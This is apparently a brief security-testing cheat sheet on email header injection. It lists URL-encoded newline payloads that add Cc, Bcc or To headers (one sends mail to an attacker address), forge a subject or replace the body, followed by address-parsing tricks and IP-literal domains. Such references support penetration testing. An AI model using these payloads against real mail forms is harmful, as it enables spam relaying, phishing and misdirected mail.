E-mail injection

Email Injections

Inject Cc and Bcc after sender argument

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

Inject argument

From:sender@domain.com%0ATo:attacker@domain.com

Inject Subject argument

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Change the body of the message

Two-line feed to change the body of the message

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

Inject in the e-mail name

  • +, - and {} are rarely used for tagging and ignored by many e-mail servers

    Example:

    <john.doe+intigriti@example.com> → <john.doe@example.com>
  • Comments between parentheses () at the beginning or the end are also ignored

    Example:

    john.doe(intigriti)@example.com → <john.doe@example.com>

IPs

IPs as domain named between square brackets:

  • john.doe@[127.0.0.1]

  • john.doe@[IPv6:2001:db8::1]

Other vulnerabilities

XSS

Template Injections

SQL injection

SSRF

Parameter pollution

(Email) header injection

Wildcard abuse

Last updated